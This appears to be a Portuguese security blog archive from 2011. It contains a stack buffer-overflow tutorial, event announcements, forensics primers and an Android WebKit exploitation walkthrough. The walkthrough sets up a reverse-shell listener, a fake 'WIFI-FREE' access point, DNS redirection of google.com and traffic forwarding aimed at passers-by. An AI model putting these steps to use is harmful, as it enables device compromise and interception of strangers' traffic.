Todas as vezes que uma função é chamada, os parâmetros da mesma são inseridos na pilha, assim como os valores salvos dos registradores (EBP, EIP). Quando uma função retorna, o valor salvo do EIP é recuperado da pilha e colocado de volta no EIP, assim o fluxo normal da aplicação pode ser seguido.

Vamos utilizar um código simples, de poucas linhas, para demonstrar o comportamento:

#include

void do_something(char *Buffer)

{

char MyVar[128];

strcpy(MyVar,Buffer);

}

int main (int argc, char **argv)

{

do_something(argv[1]);

}

Compile a aplicação com o Dev-C++ no Windows XP e execute-a com o comando:

pilha.exe AAAAA

Nada deve retornar como resultado.

Esta aplicação recebe um argumento (argv[1]) e transmite-o para a função do_something(). Nessa função, o argumento é copiado em uma variável local que suporte o máximo de 128 bytes. Bem... se o argumento for maior que 127 bytes (+ um byte nulo para finalizar a string), o buffer pode ser estourado.

Quando a função “do_something(param1)” é chamada de dentro do main(), o seguinte ocorre: um novo frame de pilha será criado, no topo da pilha correlata. O ponteiro da pilha (ESP) aponta para o endereço mais alto da nova pilha criada. Este é o “topo da pilha”.

Antes da função do_something ser chamada, um ponteiro para o(s) argumento(s) é inserido na pilha. Em nosso caso, este é um ponteiro para argv[1].

Pilha após a instrução MOV:

A seguir, a função do_something é chamada. A instrução CALL primeiramente colocará o ponteiro da instrução atual na pilha (assim saberá para onde retornar se a função finalizar) e pulará para o código da função.

Pilha após a instrução CALL:

Como resultado da inserção, o ESP decrementa em 4 bytes e agora aponta para um endereço mais baixo.

ESP aponta para 0022FF7C. Nesse endereço, podemos ver o EIP salvo (Returno to...), seguido de um indicador de ponteiro para o parâmetro (AAAA neste exemplo). Este ponteiro foi salvo na pilha antes da instrução CALL ser executada.

A seguir, o prólogo da função é executado. Ele basicamente salvo o ponteiro do frame (EBP) na pilha, assim pode ser restaurado quando a função retornar. A instrução para salvar o ponteiro do frame é “push EBP”. ESP é decrementado novamente com 4 bytes.

Seguindo ao push ebp, o ponteiro atual da pilha (ESP) é colocado em EBP. Nesse ponto, tanto ESP quanto EBP apontam para o topo da pilha. A partir desse ponto, a pilha será referenciada normalmente pelo ESP (topo da pilha em qualquer momento) e EBP (o ponteiro da base da pilha). Dessa forma, a aplicação pode referenciar variáveis usando um offset de EBP.

Obs.: A maioria das funções começam com essa sequência: PUSH EBP, seguido por MOV EBP,ESP.

Então, se você inserisse outros 4 bytes na pilha, ESP decrementaria novamente e EBP permaneceria onde estava. Você pode se referir a estes 4 bytes utilizando EBP-0x8.

A seguir, podemos ver como o espaço da pilha para a variável MyVar (128 bytes) é declarado/alocado. Para armazenar dados, algum espaço é alocado na pilha, de forma que possa guardar dados nesta variável... ESP é decrementado por um determinado número de bytes. Este número de bytes será semelhante a algo maior do que 128 bytes, devido a uma rotina de alocação determinada pelo compilador. No caso do Dev-C++, isto será de 0x98 bytes. Assim você verá uma instrução SUB ESP,0x98. Dessa forma, haverá espaço disponível para esta variável.

O código do disassembled da function parece com o que vemos a seguir:

Não se preocupe muito com o código. É possível ver claramente o prólogo da função (PUSH EBP e MOV EBP,ESP), pode-se ver também onde há espaços alocados para MyVar (SUB ESP,98), e pode-se ver algumas instruções MOV e LEA (que basicamente configuram os parâmetros para a função strcpy) controlando o ponteiro onde está argv[1] e utilizando-a para copiar dados dela, para dentro de MyVar.

Se não houvesse uma strcpy() nessa função, a função agora finalizaria e liberaria a pilha. Basicamente, apenas seria movido o ESP de volta para seu local onde o EIP salvo estava, e então se dirigiria à uma instrução RET. Uma RET, nesse caso, pegaria da pilha o ponteiro EIP salvo e faria um jump com ele (assim, ele retornará para a função principal – main – logo após a do_something() ter sido chamada). A instrução final é executada por uma instrução LEAVE (que restauraria, tanto o ponteiro do frame quanto o EIP).

Em meu exemplo, nós temos uma função strcpy().

Esta função lerá os dados, a partir do endereço apontado para [Buffer], e armazenará os mesmos no , lendo todos os dados até que surja um null byte (string de término). Enquanto copia os dados, ESP lê um byte e escreve-o na ilha, usando um índice (por exemplo, ESP, ESP+1, ESP+2, etc). Assim, após a cópia, ESP ainda apontará para o início da string.

O que significa... que se os dados no [Buffer] for maiores do que 0x98 bytes, a função strcpy() irá sobrescrever o EBP salvo e eventualmente o EIP salvo (e assim por diante). Depois de tudo, continua a ler e escrever ate alcançar um null byte (no caso de uma string).

O ESP ainda apontará para o início da string. O strcpy() finaliza como se nada estivesse errado. Após o strcpy(), a função termina. E é aqui que as coisas ficam interessantes. Basicamente, o final da função moverá o ESP de volta para o local onde o EIP salvo está armazenado, e endereçará à um RET. Pegará o ponteiro (AAAA ou 0x41414141 em nosso caso, desde que tenha sido sobrescrito), e fará um jump para aquele endereço.

Assim você controla o EIP.

E controlando o EIP, você basicamente alterará o endereço de retorno que a função utilizará para seguir adiante com o “fluxo normal”.

É claro, que se mudarmos o endereço de retorno com um estouro de buffer, isso deixará de ser um “fluxo normal”.

Então... supondo que você possa sobrescrever o buffer em MyVar, EBP, EIP e tem os A's (parâmetros passados por você) na área antes e depois do EIP salvo... pense sobre isso.

Após enviar o buffer ([MyVar][EBP][EIP][seus parâmetros]), o ESP irá, ou deveria, apontar para o início de seus parâmetros. Assim, se você puder fazer com que o EIP vá para os seus parâmetros, você está no controle.

Obs.: texto baseado no original em inglês http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Palestra sobre Metasploit no FLISOL RJ - 2011

2011-04-10T11:26:00.002-03:00

Pessoal, ontem palestrei no FLISOL RJ 2011, falando sobre o Metasploit, como ferramenta livre para prova de conceito de vulnerabilidades e ferramenta de teste de invasão.

Foi um excelente evento, com muitas palestras interessantes, como a do Luiz Guilherme sobre Python, e a do Oscar Marques sobre Android.

Dou meus parabéns ao Oscar pela organização do evento e toda a equipe que deu suporte à ele. Em breve nos veremos novamente, no fórum de software livre em Duque de Caxias, no início de junho.

Para quem não pôde comparecer ontem na UNIRIO, loca onde foi o FLISOL RJ, deixo abaixo os slides minha palestra, mas quem não foi, perdeu as demonstrações do poder do Metasploit :-)

Metasploit Framework: Software Livre para PoC de Vulnerabilidades

View more presentations from luizvieira.

Abraços à todos, e espero vê-los no evento de Duque de Caxias ou no FISL.

Explorando celulares Android via Web com airbase-ng

2011-03-30T13:23:00.002-03:00

Recentemente foi publicada uma vulnerabilidade no WebKit (CVE-2010-1807), utilizado pelo Safari e Chrome, que também afeta o browser dos celulares Android.

A vulnerabilidade foi descoberta por M.J. Keith, quem também publicou um exploit durante uma conferência em Houston, e logo Itzhak Avraham realizou algumas melhorias no mesmo, para dar-lhe maior grau de sucesso na exploração.

Esta vulnerabilidade afeta os celulares Android com a versão 2.1 e inferiores, e apesar da última versão 2.2 não ser afetada, nem todos os fabricantes ou operadoras obrigam seus usuários a atualizar o software.

Por exemplo, em meus testes, utilizei um Motorola Milestone com Android 2.1-update1, e apesar da versão 2.2 estar disponível há um bom tempo, apenas recentemente a Motorola começou a realizar os upgrades para o Milestone na América Latina, isso no primeiro trimestre de 2011.

Uma vergonha por parte dos fabricantes e operadoras! Lembrando que já está disponível a versão 2.3 do Android, agora em Março/2011.

Explorando o Android

Para explorar essa vulnerabilidade, o celular com Android deve acessar um site web que possua o código malicioso.

Poderíamos fazer isso na internet, ou como vamos fazer a seguir, levantar um Access Point falso para liberar o acesso à Internet para pessoas com celulares, e quando realizarem uma requisição específica de DNS, redirecionaremos à um site hospedado localmente com o código malicioso.

Preparando o Exploit

Baixamos o exploit e o deixamos no home do Apache com o nome "index.html":

# nano /var/www/index.html

[cole o conteúdo do exploit dentro desse arquivo, e salve]

# /etc/init.d/apache2 start

Nas primeiras linhas do exploit melhorado por Itzhak, podemos encontrar a possibilidade de facilmente alterar o endereço IP e a porta do shellcode:

var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))

Nesse caso, uma vez que a exploração tenha sucesso, será criada uma conexão reversa para o IP "192.168.0.1" na porta "12345", para a qual devemos já ter deixado em estado de escuta o netcat nessa porta:

# nc -l -p 12345 -n -vvv
listening on [any] 12345 ...

Preparando o Access Point falso

Com o que foi executado no passo anterior, já estaríamos em condição de atacar com sucesso uma vítima se tivéssemos utilizando um IP público na Internet.

Mas a ideia a seguir é levantar um Access Point falso com o airodump-ng para que as pessoas com celulares acessem o mesmo em busca de internet grátis, e quando realizarem uma requisição à um DNS específico, redirecionamos a vítima para nosso Apache com o código malicioso.

Primeiro vamos configurar o Dnsmasq, que nos vair prover o serviço de DNS e DHCP para nosso Access Point falso. Se não os tivermos instalado, podemos fazer da seguinte forma:

# apt-get install dnsmasq
# /etc/init.d/dnsmasq stop

Logo devemos nos assegurar de configurar em qual interface de rede o Dnsmasq ficará escutando, configurar o range de endereços IP que entregará às vítimas, e qual o domínio será redirecionado para nosso Apache com o exploit, que nesse caso será "google.com":

# nano /etc/dnsmasq.conf

interface=at0
dhcp-range=192.168.0.5,192.168.0.20,12h
address=/google.com/192.168.0.1

# /etc/init.d/dnsmasq start

Se tivermos internet (3G por exemplo, se estivermos em algum local público), seria uma boa idéia encaminhar todo o tráfego para que a vítima acredite que está em uma rede wireless comum, e de brinde teremos a possibilidade de capturarmos algo de seu tráfego:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Finalmente, levantamos o Access Point falso com o airbase-ng e configuramos a interface de rede "at0", criada pelo airbase-ng, com o endereço IP onde se realizará a conexão reversa:

# airbase-ng -C 30 --essid "WIFI-FREE" wlan0
# ifconfig at0 192.168.0.1 netmask 255.255.255.0 up

Nesse caso, a rede se chama "WIFI-FREE", mas podemos colocar qualquer outro nome que escolhermos.

Atacando a vítima

Por minha experiência com o Motorola Milestone, quando habilitamos a placa wireless do celular, inicia-se a detecção de redes na área e conectamos manualmente na qual desejamos, principalmente nas que estão abertas e sem criptografia. Depois da primeira vez que fazemos isso, nas vezes seguintes a conexão é automática.

Quando a vitima estiver conectada, o tráfego de rede passará normalmente até o momento em que a vítima acesse o "www.google.com", de onde será direcionada para nosso Apache e obteremos uma conexão reversa no netcat que deixamos escutando:

Uma vez que recebemos a conexão reversa, podemos executar comandos do Android como "/system/bin/id" ou "/system/bin/ps" para verificar que efetivamente podemos acessar o dispositivo.

That's all folks!

FLISOL RJ - 09/04/2011

2011-03-28T22:41:00.001-03:00

No próximo dia 9 de abril vai acontecer na UNIRIO - URCA a edição carioca do maior evento de divulgação de software livre da América Latina: o FLISOL (Festival Latino Americano de Instalação de Software Livre).

Durante todo o dia você poderá levar seu computador para que nossos técnicos instalem diversos softwares livres de forma gratuita e segura! Além disso, teremos uma excelente programação, com palestras e mini-cursos, para você não apenas conhecer, mas também aprender a utilizar os programas que estão revolucionando a informática no mundo todo.

Estaremos com 2 grandes salas com capacidade para 70 pessoas cada sala.
Teremos 5 mini-salas com os seguintes eventos:

Apache Meet (Meet da Fundação Apache).
Debate sobre Copyleft e Cultura Livre.
Workshop de Computação Gráfica.
Workshop de Arduino (com a ArduInRio).
Install Fest.
Debate sobre Cultura e Produção Livre.

Teremos 16 palestras com as seguintes Comunidades de Software e Hardware Livre e afins do Rio de Janeiro:

Alguns exemplos de Sistemas Operacionais que poderemos instalar gratuitamente!.

=> Podemos manter seu sistema + os seguintes (ou podemos remover e instalar, ZERANDO seu computador).

=> Podemos instalar também

Mozilla Firefox (navegador mais rápido e seguro que o Internet Explorer®)
LibreOffice (substituto livre do Microsoft® Office)
Lista de outros possíveis softwares, clique aqui.

=> Se você tem impressora, favor imprimir o documento de responsabilidade, clicando aqui.

Favor imprimir este documento e levar com seu equipamento.

Obs: Se você não mora no Rio de Janeiro, verifique aqui se o evento ocorrerá em sua cidade.

O que devo fazer para me preparar para as instalações?

1) Checagem de Hardware:

No Windows, vá até o Painel de Controle e escolha Sistema. Liste:

Placa de rede (marca, modelo, configuração)
Placa de vídeo (marca, modelo, configuração)
Placa de Som (marca, modelo, configuração)
CPU (Processador)
Memória RAM
Modem (marca, modelo, configuração)
Espaço livre em disco (mínimo de 5.0 Gb)
Componentes SCSI (se houver algum)

2) Backup dos dados:

Por precaução, você deve fazer uma cópia dos seus dados importantes para algum local seguro (como o computador de um amigo ou CD-ROM).

3) Desfragmentação do disco:

No Windows, para desfragmentar o disco, primeiro feche todos os programas (isto incluirá MSN, navegadores ou qualquer outro programa que estiver rodando). A seguir, clique em Iniciar -> Programas -> Acessórios -> Desfragmentador de Disco. A seguir, clique em "Iniciar" na janela que aparecer.

4) Particionamento do disco:

se você souber como fazer, faça uma partição de no mínimo 5.0 Gb. Quanto maior for essa partição, mais utilidades do Linux poderão ser instaladas. Se você não souber fazer isso, nós faremos no dia do Install Fest. Apenas irá demorar mais tempo.

Obs 1: Os custos de transporte do seu computador são de sua responsabilidade.

Obs 2: Se tiver, leve ao evento os manuais do seu hardware (para caso apareçam dúvidas a seu respeito).

Obs 3: Esteja ciente do termo de responsabilidade, e todos os passos necessários ao instalar e/ou remover um sistema operacional do seu computador.

Webcast Tutorial: Forense Computacional com Software Livre

2011-03-21T12:15:00.001-03:00

No dia 24/03/11 acontecerá o Webcast Tutorial: Forense Computacional com Software Livre, com Luiz Vieira.

Dentro de 4 a 5 anos é esperado que a maioria das questões judiciais envolvam a forense computacional, pois evidências digitais estarão direta ou indiretamente ligadas aos casos, como hoje estão na vida de todos nós. Porém, como em todas as novas técnicas e descobertas, o mercado está escasso de profissionais nesta área e carente de profissionais certificados em forense digital.

É maior o número de casos judiciais e investigações administrativas onde filmagens, fotos, ligações, e-mails e outras formas digitais são levantadas para melhor esclarecer a questão apresentada a ser investigada.

Tópicos que serão abordados nesta edição:

O que é Forense Computacional?
Principais desafios da Forense Computacional
Passos de uma Investigação
Análise Viva e Post Mortem
Distribuições Linux para Forense
Ferramentas Livres e Toolkits para Forense

Perguntas que serão respondidas:

Quantas áreas de atuação de forense digital existem?
Qualquer ferramenta pode ser utilizada durante um processo de investigação?
Quais os passos que um profissional deve seguir durante uma investigação?
A coleta de evidências segue sempre o mesmo padrão, seja da memória primária, seja secundária?

Sobre o palestrante:

Luiz Vieira tem 15 anos de atuação na área de TI, tendo, ao longo de sua trajetória profissional, tornado-se Especialista em Segurança da Informação e Auditoria de sistemas. Capacitado e com experiência em auditoria, teste de invasão em sistemas, redes e aplicações WEB. Desenvolve projetos de redes com topologias seguras, proteção de perímetro, hardening, implementação de sistemas de monitoramento e detecção de invasão.

Resenhista de vários livros sobre Segurança da Informação para editoras especializadas (Brasport, Ciência Moderna), articulista dos sites Imasters, VivaOLinux, SegurançaLinux e Revista Espírito Livre.

Foi palestrante durante a 11ª edição do Fisl (Fórum Internacional do Software livre) e apresentador do tutorial "Analysis of Vulnerabilities in Web Applications", durante a edição da LinuxCon Brasil2010.

Todos os Webcasts serão disponibilizados posteriormente no formato Podcast Download.

Faça sua inscrição gratuita!

Todos que fizeram inscrição receberão instruções de acesso com antecedência.

Cursos relacionados:

Segurança em Servidores Linux usando a ISO27002
Pen test: Teste de Invasão em Redes Corporativas
Investigação Forense Digital

Webcast Tutorial: Criptografia on-the-fly: segurança em tempo real

2011-03-21T12:14:00.000-03:00

No dia 22/03/11 acontecerá o Webcast Tutorial: Criptografia on-the-fly: segurança em tempo real, com Luiz Vieira.

Com o grau de importância dado à informação atualmente, a criptografia e as ferramentas que permitem aplicar esse conceito aos ativos de uma empresa, cumprem muito bem o papel de proteger essas informações. Por conta disso, apresentaremos uma série de soluções baseadas em software livre que possibilitam termos um alto nível de proteção, sem perda de desempenho e sem comprometer a segurança.

Tópicos que serão abordados nesta edição:

O que é criptografia?
Técnicas que se utilizam de criptografia
Prós e Contras
Ferramentas livres para criptografia

Perguntas que serão respondidas:

O que pode acontecer se eu perder minha senha?
Posso criptografia apenas arquivos ou posso fazer isso com sistemas inteiros?
Há perda de performance com a criptografia?
O que as ferramentas livres tem de melhor que as soluções pagas?

Sobre o palestrante:

Todos os Webcasts serão disponibilizados posteriormente no formato Podcast Download.

Faça sua inscrição gratuita!

Todos que fizeram inscrição receberão instruções de acesso com antecedência.

Cursos relacionados:

Segurança em Servidores Linux usando a ISO27002
Pen test: Teste de Invasão em Redes Corporativas
Investigação Forense Digital

Webcast Tutorial: Metasploit Framework: Software Livre para PoC de Vulnerabilidades

2011-03-16T14:03:00.002-03:00

No dia 17/03 às 20h acontecerá o Webcast Tutorial: Metasploit Framework: Software Livre para PoC de Vulnerabilidades, com Luiz Vieira.

O framework de segurança Metasploit, é uma ferramenta muito utilizada para provas de conceito e teste de invasão, pois reúne muitos exploits e módulos auxiliares sempre em constante atualização, que permitem ao profissional de segurança testar os sistemas que serão alvo de uma auditoria ou avaliação de segurança.

Tópicos que serão abordados nesta edição:

Estrutura do Metasploit Framework e seus componentes
Metasploit Meterpreter
Armitage
Prova de Conceito com Metasploit

Perguntas que serão respondidas:

O que é o Metasploit?
Como utilizar o Metaspoit para prova de conceito?
Como desenvolver exploits para o Metasploit?
Quais as principais características do Meterpreter?

Sobre o palestrante:

Foi palestrante durante a 11ª edição do Fisl (Fórum Internacional do Software livre) e japresentou o tutorial "Analysis of Vulnerabilities in Web Applications", na LinuxCon Brasil2010.

Todos os Webcasts serão disponibilizados posteriormente no formato Podcast Download.

Faça sua inscrição gratuita!

Todos que fizeram inscrição receberão instruções de acesso com antecedência.

Grupo sobre Exploits e Vulnerabilidades

2011-03-12T16:01:00.002-03:00

Eu e o Ronaldo Lima (http://www.crimesciberneticos.com/) estamos iniciando um grupo de discussão sobre desenvolvimento de exploits e pesquisa de vulnerabilidades, em língua portuguesa.

O grupo Exploits-Brasil é destinado a todos que se interessam pelo assunto, independentemente do nível de conhecimento de cada um.

Para se inscrever no grupo acesse esse endereço:

https://groups.google.com/group/exploits-brasil

Venha participar do grupo e ajude a divulgá-lo!

Forense Computacional - Conceitos Iniciais - Parte 3 - Final

2011-03-06T18:12:00.002-03:00

“A forense computacional é o equivalente ao levantamento na cena de um crime ou a autópsia da vítima ”. - James Borek

Atualmente, a maioria dos documentos existentes possuem seu equivalente no formato digital, e daqui há algum tempo, os documentos digitais dominarão qualquer tipo de negociação, autenticação, permissão ou qualquer outra ação legal.

Sem contar, que muito do que manipulamos de informação atulamente, está em formato virtual, sem equivalência do mundo físico. Por conta disso, em 4 ou 5 anos, todos os casos judiciais envolverão a análise forense computacional.

A forense computacional também pode atuar nas seguintes situações:

Buscar e identificar dados em um computador;
Recuperação de arquivos deletados, encriptados ou corrompidos em um sistema;
Fundamentar demissões de funcionários que desreiptam normas organizacionais;
Auxiliar na quebra de contratos que não são respeitados;
Provar fatos;
Fazer cumprir as leis de privacidade.

E como as evidências digitais são delicadas por natureza, é necessário um profissional qualificado e que tenha conhecimento suficiente para realizar a análise forense deum sistema comprometido, ou que possua evidências necessárias ara a comprovação de determinados fato.

E o principal objetivo do investigador forense computacional é determinar a natureza e os eventos relacionados a um crime ou ato malicioso, e localizar quem o perpetrou, seguindo um procedimento de investigação estruturado. Esse procedimento de investigação estruturado esta baseado em metodologias que defininem os passos básicos para o rumo de uma análise, permitindo que o profissional, inclusive, possa organizar seu kit personalizado de ferramentas para facilitar todo o processo.

Crime Cibernético

Um crime cibernético é definido como qualquer ato ilegal envolvendo um computador, seu sistema ou suas aplicações. E para ser tipificado como crime, o ato deve ser intencional, e não acidental.

E um crime cibernético possui três diferentes aspectos a serem analisados:

Ferramentas do crime
Alvo do crime
Tangente do crime

E o mesmo deve ser de duas categorias diferentes:

Ataque interno
Ataque externo

Exemplos de crimes cibernéticos

Alguns exemplos de crimes cibernéticos incluem:

Roubo de propriedade intelectual
Avaria na rede de serviço das empresas
Fraude financeira
Invasão de crackers
Distribuição e execução de vírus ou worm

Essa pequena lista, obviamente, não é exaustiva, mas leva em consideração as ocorrências de maior incidência.

E a motivação dos ataques podem ser as mais variadas possíveis, como as seguintes:

Testes, ou tentivas de aprender na prática, por script kiddies
Necessidade psicológica
Vingança ou outras razões maliciosas
Desejo de causar problemas para o alvo
Espionagem – corporativa ou governamental

Papel do Investigador

O principal objetivo do investigador forense computacional é determinar a natureza e os eventos relacionados a um crime ou ato malicioso e localizar quem o perpetrou, seguindo um procedimento de investigação estruturado.

O conhecimento necessário para realizar a investigação, atualmente está mais baseado em um conhecimento empírico do que teórico. Isso acaba sendo uma faca de dois gumes, pois para atuar como profissional, o mesmo precisa ter experiência na área; no entanto, esse mesmo profissional, apesar do conhecimento prático, muitas vezes não tem o embasamento teórico necessário para desenvolver ou seguir uma metodologia válida.

O investigador, precisa respeitar uma metodologia confiável e válida, para que o processo não sofra qualquer tipo de invalidação por conta de algum passo ou fase mal coordenada, pois isso pode colocar toda uma investigação a perder, posto que suas evidência podem ser tornar provas sem fundamentação legal, e seu relatório não será levado em consideração caso esteja envolvido em um processo judicial.

Daí a importância do investigador, participar de eventos, treinamentos e procurar pesquisar os fundamentos e técnicas dessa área de atuação para realizar os procedimentos de investigação da maneira mais correta possível.

É importante que o profissional mantenha uma conduta correta ao longo da investigação, para que todo o processo também não seja invalidado.

Alguns dos aspectos que tem correlação com sua conduta, são os seguintes:

A conduta profissional determina a credibilidade de uma investigação forense
O profissional deve demonstrar o mais alto nível de integridade ética e moral
Confidencialidade é uma característica essencial que todo investigador deve possuir
Discutir o caso investigado apenas com as pessoas que possuem permissão para tomar conhecimento do processo

Formações na área de Software Livre

2011-03-06T11:19:00.000-03:00

Desde o início do ano, surgiu no mercado brasileiro projeto de treinamentos focados em Software Livre que achei interessante citar aqui.

O projeto denomina-se Universidade Open Your Source, liderada por profissionais da área de software livre e que trabalham com sistemas UNIX like: Solaris, Linux, FreeBSD e etc. Mas o que mais me chamou a atenção foram as ementas dos cursos oferecidos, principalmente por cobrarem um valor bem abaixo do mercado pela qualidade do que oferecem, com o objetivo de facilitar a inclusão no mercado de profissionais que não podem investir grandes somas em sua formação, mas querem cursos com um excelente nível de qualidade.

Só na área de segurança, já oferecem cursos de Segurança de Servidores e Teste de Invasão, tendo previsão de em breve oferecerem cursos de Forense Computacional, Análise de Malware e Desenvolvimento de Ferramentas de Segurança e Exploits.

Para maiores informações sobre as ementas dos cursos, acessem a página http://www.openyoursource.com/portal/?q=node/117

Conheço os profissionais que ministram os cursos, e os responsáveis pelo projeto. Justamente por isso, indico o projeto para aqueles que querem cursos EaD de altíssima qualidade, sem precisar pagar preços extorsivos.

Sucesso para todos!

Webcast Tutorial: Teste de Invasão como Arte: Faça muito com poucas ferramentas

2011-03-04T16:51:00.001-03:00

No dia 10/03 acontecerá o Webcast Tutorial: Teste de Invasão como Arte: Faça muito com poucas ferramentas. Esse Webcast faz parte de uma série especial, sobre segurança, que será realizada durante todo o mês de março.

Data: 10/03/2011
Horário: Das 20h às 20h30min.

Tópicos que serão abordados nesta edição:

Objetivos de um Teste de Invasão
O Teste de Invasão tradicional está morto!
Fases de um Teste de Invasão
Principais Ferramentas

Perguntas que serão respondidas nesta edição:

Quais as fases mais importantes de um teste de invasão?
Quais as principais ferramentas em um teste de invasão?
No que se deve dar mais atenção durante um pentest?
Por que fazer um teste de invasão?

Sobre o palestrante:

Luiz Vieira é Analista de Segurança, atua na área de TI desde 1995, com larga experiência em WEB, Desenvolvimento, Segurança e Linux. É analista de segurança, e trabalha com Proteção de Perímetro, Auditoria, Teste de Invasão e Forense Computacional. Atualmente é Consultor de Segurança da Informação na empresa 4Linux.

Faça sua inscrição gratuita!

Todos os Webcasts serão disponibilizados depois em forma de Podcast Download.

Webcast gratuito sobre monitoramento integrado com OSSIM

2011-03-03T10:31:00.001-03:00

Participe do Webcast Tutorial: Monitoramento integrado com OSSIM. O OSSIM monitora e integra mais de 100 ferramentas diferentes de monitoramento: desde SNORT à OSSEC e Nagios. Dessa maneira, ele permite monitorar desde serviços ativos à tentativas de invasão e ações maliciosas realizadas por usuários, como a varredura de um host em busca de vulnerabilidades para atacar.

Data: 03/03/2011
Horário: Das 20h às 20h30min.

Tópicos que serão abordados nesta edição:

Importância do Monitoramento;
Características do framework OSSIM;
Ferramentas Integradas e sua importância;
Compliance com normas ISO;

Perguntas que serão respondidas nesta edição

Como o OSSIM pode ajudar-me à monitorar minha rede?
Qual a importância da integração de ferramentas de monitoramento?
Quais as ferramentas o OSSIM utiliza?
O que pode ser monitorado com o OSSIM?

Sobre o palestrante:

Faça sua inscrição gratuita!

Os Webcasts são divulgados posteriormente em forma de Podcast Download.

Workshop Fundamentos de Segurança e Hardening de Servidores - Gratuito

2011-02-13T22:56:00.000-02:00

Duração: 3 horas

Data: 15/02/2011

Horário: das 15 às 18h

Pré requisito: Ter conhecimento de utilização de Linux e uma máquina virtual configurada com o Debian Linux.

O aluno aprenderá sobre a importância da segurança da informação e como podemos aplicá-la em nosso ambiente computacional, através do hardening de servidores. O aluno também aprenderá como utilizar a norma ISO 27002 para fundamentar controles de segurança aplicados nos servidores, bem como identificar, de acordo com o contexto, que tipo de controle será necessário.

Inscreva-se aqui.

Livros técnicos grátis

2011-02-09T09:04:00.002-02:00

Pessoal, tem um site muito interessante que todos os meses sorteia 101 livros técnicos grátis, bastando que se cadastre no site e adicione os livros que gostaria de ganhar em sua lista de desejos. E o melhor, até o envio é grátis independente do país onde mora!

O link para o site é: http://www.101ftb.com/?rid=K90Q50N172

Aproveitem a oportunidade e vamos ganhar livros!

WIN FREE Tech Books!

Why pay for Tech Books when you can get them for FREE! 101FTB.com raffles 101 Tech Books each month. Join Now http://101ftb.com/K90Q50N172

Forense Computacional - Conceitos Iniciais - Parte 2

2011-02-08T10:57:00.000-02:00

As atividades que envolvem tecnologia tornaram-se parte de nossa vida diária, assim como de quase todas as pessoas ao redor do mundo inteiro.

A partir dessa percepção, podemos compreender o nível de importância da forense digital, pois de acordo com informações do FBI, 85% das empresas e governos, já detectaram falhas e vulnerabilidades em seus sistemas. E por conta dessa informação, entendemos o porque dos EUA sofrerem prejuízos de mais de 10 bilhões de dólares por causa do crime digital.

Definição

A forense digital, é uma ciência ou técnica relativamente recente no campo da segurança digital , pois poucas décadas no separam do surgimento do computador de demais dispositivos tecnológicos que poderiam ser utilizados em crimes digitais.

Essa ciência inclui a preservação, coleta, confirmação, identificação, análise, cópia e a apresentação de informação sobre a atividade maliciosa. E o processo de investigação é que nos provê as informações necessárias para a análise forense, que vai nos levar à conclusão final que poderá servir até mesmo como base para uma decisão judicial.

Investigação digital

“Uma série metódica de técnicas e procedimentos para coletar evidências de um sistema computadorizado, de dispositivos de armazenamento ou de mídia digital, que podem ser apresentadas em um foro de uma forma coerente e formato inteligível”. - Dr. H. B. Wolf

A investigação digital é um processo onde uma hipótese é desenvolvida e testada para responder algumas questões à respeito de uma ocorrência digital .

As informações utilizadas durante a recriação do cenário, são coletadas ao longo do processo de investigação, em uma de suas fases iniciais. Com tais informações, é possível compreender o que ocorreu, como ocorreu e até mesmo o objetivo por detrás das ações do responsável pelo comprometimento do artefato digital.

E a investigação digital tem como objetivo suportar ou desmentir uma hipótese apresentada por uma análise inicial, e muitas vezes superficial, do cenário comprometido.

Investigação digital X Forense digital.

Por mais que pareça incoerente e estranho, a investigação digital difere da forense digital em inúmeros pontos do processo. Apesar de o objetivo central ser praticamente o mesmo.

A principal diferença entre a investigação digital e a forense digital é a parte legal. Pois em um processo de análise forense existe uma preocupação legal, não só uma preocupação técnica , ao longo de todo o processo. Essa preocupação legal deve-se ao objetivo final de cada uma dessas operações. A análise forense procura chegar numa conclusão final, que permita apresentar um relatório com provas bem fundamentadas e amparadas nas leis vigentes daquele país, pois o mesmo será utilizado para embasar uma decisão judicial, que precisa estar de acordo com os aspectos legais de um processo válido. Do contrário, a investigação não alcançará seu objetivo, que é fundamentar ou desmentir uma hipótese apresentada durante a análise do caso.

Pelo fato da forense digital ser algo recente, as interpretações das leis podem mudar, bem como a reação às novas ameaças. O que acaba dificultando o processo de investigação, pois ainda se utiliza leis de um paradigma antigo, para enquadrar crimes ocorridos em um paradigma completamente diferente, com artefatos diferentes, objetivos e métodos diversos.

Já a investigação digital tem um foco diverso, mais voltado para as técnicas e ferramentas utilizadas do que ao aspecto legal de um processo judicial. Isso permite ao perito focar seu trabalho em descobrir e analisar as evidências de forma mais técnica e aprofundada, não se preocupando em demasia com os apectos legais de todo o processo.

História

A origem da forense computacional, remonta à década de 80, quando os computadores tornam-se mais populares, principalmente em países de primeiro mundo.

Em 1984, o CART surgiu, como resposta do FBI aos incidentes computacionais cada vez mais frequentes com o surgimento da ARPA NET. O CART é o Computer Analysis and Response Team, o primeiro grupo de resposta a incidentes, surgido com o objetivo de lidar com crimes computacionais.

Em 1991, ocorre o primeiro encontro de International Law Enforcement, organizado para conduzir a discussão sobre forense computacional e a necessidade de padronizar uma metodologia de atuação.

Logo depois, em 1997, o Scientific Working Group on Digital Evidence (SWGDE) foi estabelecido, com o objetivo de desenvolver a padronização discutida no evente do 1994.

E em 2001, ocorreu o primeiro Digital Forensic Research Workshop, que atualmente possui uma periodicidade anual, e conta com palestrantes de diversos lugares, assim como desafios onde qualquer pessoa pode participar, para praticar e testar seus conhecimentos de forense computacional. Mais informações sobre as várias edições ocorridas podem ser encontradas em http://www.dfrws.org/ .

Definição

De acordo com Steve Hailey, do Cybersecurity Institute, forense computacional é:

“Preservação, identificação, coleta, interpretação e documentação de evidências computacionais, incluindo as regras de evidência, processo legal, integridade da evidência, relatório factual da evidência e provisão de opinião de especialista em uma côrte judicial, ou outro tipo de processo administrativo e/ou legal com relação ao que foi encontrado”.

A área de forense computacional é completamente diferente de todas as áreas de segurança, e também de outras áreas da ciência forense, devido ao modo como uma investigação deve ser levada à cabo.

E diferentemente das outras áreas de segurança, presta muita atenção aos aspectos legais e as leis vigentes no país onde se conduz a investigação.

